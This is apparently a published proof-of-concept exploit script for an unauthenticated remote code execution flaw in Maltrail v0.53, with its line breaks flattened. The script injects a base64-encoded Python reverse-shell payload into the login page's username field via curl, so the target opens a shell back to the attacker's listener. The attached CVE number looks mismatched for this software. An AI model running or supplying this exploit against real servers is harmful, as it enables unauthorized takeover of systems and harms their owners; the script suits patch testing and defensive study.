Maltrail 0.53 Remote Code Execution

# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)# Exploit Author: Iyaad Luqman K (init_6)# Application: Maltrail v0.53# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoCimport sys;import os;import base64;def main():  listening_IP = None  listening_PORT = None  target_URL = None  if len(sys.argv) != 4:    print("Error. Needs listening IP, PORT and target URL.")    return(-1)    listening_IP = sys.argv[1]  listening_PORT = sys.argv[2]  target_URL = sys.argv[3] + "/login"  print("Running exploit on " + str(target_URL))  curl_cmd(listening_IP, listening_PORT, target_URL)def curl_cmd(my_ip, my_port, target_url):  payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''  encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64  command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"  os.system(command)if __name__ == "__main__":  main()